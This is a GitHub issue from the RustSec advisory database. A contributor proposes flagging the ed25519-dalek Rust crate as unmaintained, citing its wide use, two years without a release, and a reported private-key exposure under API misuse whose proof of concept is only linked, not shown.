advisory-db icon indicating copy to clipboard operation
advisory-db copied to clipboard
verified publisher icon rustsec

`ed25519-dalek` Status

Open pinkforest opened this issue 3 years ago • 0 comments

This is pretty important crate and it is sad if we would have to flag it as info- Unmaintained / Notice :sob:

NOTE: This does NOT necessarily mean the crypto on ed25519-dalek is inherently broken or insecure as of now

e.g. Depending on how we classify / see broken / insecure - people often see crypto-failure where pub API was not misused

Nonetheless facts -

6,821,009 downloads all time - 12k per day

Major downstream include ed25519, libp2p-core, solana-runtime, solana-sdk, signatory, lettre, ..

Crate has not had new publish in two years: https://crates.io/crates/ed25519-dalek

There may be a potential PrivateKey exposure that relies on public API misuse:

  • https://github.com/dalek-cryptography/ed25519-dalek/issues/209
  • w/ PoC at https://github.com/MystenLabs/ed25519-unsafe-libs
  • PR https://github.com/dalek-cryptography/ed25519-dalek/pull/205 from 30 June

Considering the above alone it might be feasible to flag Unmaintained / Notice on this at least.

@tarcieri could we ask @isislovecruft if ed25519-dalek could be forked under RustCrypto or smth and to get the maintenance back on track ?

Crates ed25519 and Signatory are downstream high level / proxies for this

pinkforest avatar Aug 14 '22 09:08 pinkforest